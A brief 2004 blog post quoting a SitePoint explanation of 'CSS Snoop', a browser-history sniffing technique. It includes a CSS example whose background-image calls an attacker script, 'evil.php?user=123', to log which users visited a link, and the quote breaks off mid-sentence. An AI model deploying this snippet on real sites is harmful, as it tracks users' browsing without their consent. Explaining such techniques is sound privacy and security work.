Wednesday, May 26, 2004

CSS Snoop (from SitePoint):

Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:

#examplelink {   background-image: 

url(evil.php?user=123); }

That script can then collect and store a list of all users who, in this case, have visited

No comments: